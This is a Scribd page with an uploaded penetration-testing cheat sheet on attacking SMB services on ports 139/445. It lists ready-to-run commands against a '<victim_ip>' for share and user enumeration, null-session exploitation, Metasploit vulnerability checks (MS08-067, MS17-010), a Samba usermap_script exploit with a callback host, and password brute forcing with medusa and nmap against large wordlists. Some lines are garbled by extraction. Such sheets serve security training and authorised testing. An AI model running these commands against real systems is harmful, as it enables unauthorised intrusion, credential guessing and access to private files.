Scribd Logo
Carica

Benvenuto in Scribd!

  • Categories OS Tool Intent Command Comments: Nmblookup

    Caricato da

    Yassine Idbougnoun
    50 visualizzazioni2 pagine
    This document provides information on tools and techniques for enumerating and exploiting SMB services on port 139/445. It lists Linux and Windows tools like nmblookup, enum4linux, nmap scripts, smbclient, rpcclient, and Metasploit modules that can be used to gather information like hostnames, shares, and versions. It also describes how to check for null sessions and common vulnerabilities using tools like smbmap, enum, and Nmap SMB scripts.

    Descrizione originale:

    Titolo originale

    smb

    Copyright

    © © All Rights Reserved

    Formati disponibili

    PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    This document provides information on tools and techniques for enumerating and exploiting SMB services on port 139/445. It lists Linux and Windows tools like nmblookup, enum4linux, nmap scripts, smbclient, rpcclient, and Metasploit modules that can be used to gather information like hostnames, shares, and versions. It also describes how to check for null sessions and common vulnerabilities using tools like smbmap, enum, and Nmap SMB scripts.

    Copyright:

    © All Rights Reserved
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    50 visualizzazioni2 pagine

    Categories OS Tool Intent Command Comments: Nmblookup

    Caricato da

    Yassine Idbougnoun
    This document provides information on tools and techniques for enumerating and exploiting SMB services on port 139/445. It lists Linux and Windows tools like nmblookup, enum4linux, nmap scripts, smbclient, rpcclient, and Metasploit modules that can be used to gather information like hostnames, shares, and versions. It also describes how to check for null sessions and common vulnerabilities using tools like smbmap, enum, and Nmap SMB scripts.

    Copyright:

    © All Rights Reserved
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 2

    SMB - 139/445

    Categories OS Tool Intent Command Comments


    nmblookup -A <victim_ip>
    139/445 - smb Linux nmblookup Enumerate hostname

    enum4linux -n <victim_ip> Versions Samba 2.2.x are red flag


    139/445 - smb Linux enum4linux Enumerate hostname

    $ nmap --script=smb-enum* --script-


    Linux / args=unsafe=1 -T5 <victim_ip>
    139/445 - smb nmap Quick Enumeration
    Windows
    smbver.sh <victim_ip> Script used to get smb version if nmap
    139/445 - smb Linux smbver script get version fails

    Msfconsole;use scanner/smb/smb_version metasploit modele to get smb version


    139/445 - smb Linux Metasploit get version

    ngrep -i -d tap0 's.?a.?m.?b.?a.*[[: Manual method to get version if all else


    139/445 - smb Linux ngrep get version digit:]]' fails
    smbclient -L \\\\<victim_ip>
    #1:run Wireshark noted by 1kwstassak in reddit.com
    linux / #2:smbmap -H <victim_ip>
    139/445 - smb wireshark get version
    windows #3:follow the tcp stream of the smb
    negotiation
    smbmap -H <victim_ip> -R <sharename>
    139/445 - smb linux smbmap get shares Recursively display files in specific
    share
    echo exit | smbclient -L \\\\$ip
    139/445 – smb linux smbclient get shares

    smbclient \\\\<victim_ip>\\<share> more details in cherrytree file (1.


    139/445 - smb linux smbclient get shares information gathering > Active >
    Enumeration > Services > 139.SMB)
    smbclient -L //<victim_ip> -N -N Force the tool to not ask for password
    139/445 – smb linux smbclient get shares

    Linux / nmap --script smb-enum-shares -p139,445 -


    139/445 - smb nmap get shares T4 -Pn <victim_ip>
    Windows
    smbclient -L \\\\<victim_ip>\\ more details in cherrytree file (1.
    139/445 - smb linux smbclient get shares information gathering > Active >
    Enumeration > Services > 139.SMB)
    smbmap -H <victim_ip> vulnerable version :
    Windows NT, 2000, and XP (most SMB1) -
    VULNERABLE: Null Sessions can be created
    by default
    139/445 - smb linux smbmap Check Null Sessions Windows 2003, and XP SP2 onwards - NOT
    VULNERABLE: Null Sessions can't be created
    default
    Most Samba (Unix) servers
    rpcclient -U "" -N $ip
    139/445 – smb linux rpcclient Check Null Sessions

    smbclient //<victim_ip>/IPC$ -N Success #:/smb>


    139/445 – smb linux smbclient Check Null Sessions

    enum -s <victim_ip> enumerate the shares of a machine


    139/445 – smb linux enum Exploit null Sessions

    enum -U <victim_ip> -U enumerate usersA133:AMJ133


    139/445 – smb linux enum Exploit null Sessions

    enum -P <victim_ip> -P check the password policy


    139/445 – smb linux enum Exploit null Sessions

    enum4linux -a <victim_ip> enum4linux -a (use all enum switches


    139/445 – smb linux enum4linux Exploit null Sessions useres/shares/password policies)
    using /usr/share/doc/python3-
    impacket/examples/samrdump.py
    139/445 – smb linux samrdump.py Exploit null Sessions #./samrdump.py <victim_ip>

    connect to Username $ smbclient //$ip/share -U username this step required u have a cred
    139/445 - smb linux smbclient
    shares
    smbclient \\\\<victim_ip>\\<share> more details in cherrytree file (1.
    information gathering > Active >
    connect to share Enumeration > Services > 139.SMB)
    139/445 - smb linux smbclient
    Anonymously Example : smbclient \\\\<victim_ip>\\IPC$

    smbclient //<victim_ip>/<share>
    connect to share
    139/445 - smb linux smbclient
    Anonymously
    smbclient //<victim_ip>/<share\ name> If share has a space inbetween its name
    connect to share smbclient //<victim_ip>/<"share name"> (eg. "My Shares")
    139/445 - smb linux smbclient
    Anonymously

    rpcclient -U " " <victim_ip> Connect to null share which is the IPC$
    connect to share share, enumerate with specifc commands,
    139/445 - smb linux rpcclient
    Anonymously refer to onenote

    rpcclient -U " " -N <victim_ip> Connect to null share which is the IPC$
    connect to share share, enumerate with specifc commands,
    139/445 - smb linux rpcclient
    Anonymously refer to onenote

    nmap --script smb-vuln* -p139,445 -T4 -Pn


    linux /
    139/445 – smb nmap check vuln <victim_ip>
    Windows
    #msf> resource smb_checks.rc # This resource scripts will check common
    Or security concerns on SMB for Windows.
    # msfconsole -r /usr/share/metasploit- # Specifically, this script will check for
    Linux / check common security framwork/scripts/resource/smb_checks.rc these things: #
    139/445 – smb Metasploit # * MS08-067.
    Windows concerns
    # * MS17-010.
    # * SMB version 1. #

    #msf> resource smb_validate.rc after running the previous check


    Or
    Linux / # msfconsole -r /usr/share/metasploit-
    139/445 – smb Metasploit extra validation
    Windows framwork/scripts/resource/smb_validate.rc

    msfconsole; use
    Linux / exploit/multi/samba/usermap_script; set
    139/445 – smb Metasploit multi exploits
    Windows lhost 192.168.0.X; set rhost $ip; run
    after enumerating users u can brute force
    login
    #medusa -h <victim_ip> -u userhere -P
    /usr/share/seclists/Passwords/Common-
    Credentials/10k-most-common.txt -M smbnt
    #nmap -p445 --script smb-brute --script-
    139/445 – smb linux nmap/medusa Brute Force login args userdb=userfilehere,
    passdb=/usr/share/seclists/Passwords/Commo
    n-Credentials/10-million-password-list-
    top-1000000.txt <victim_ip> -vvvv
    #nmap –script smb-brute <victim_ip>

    Potrebbero piacerti anche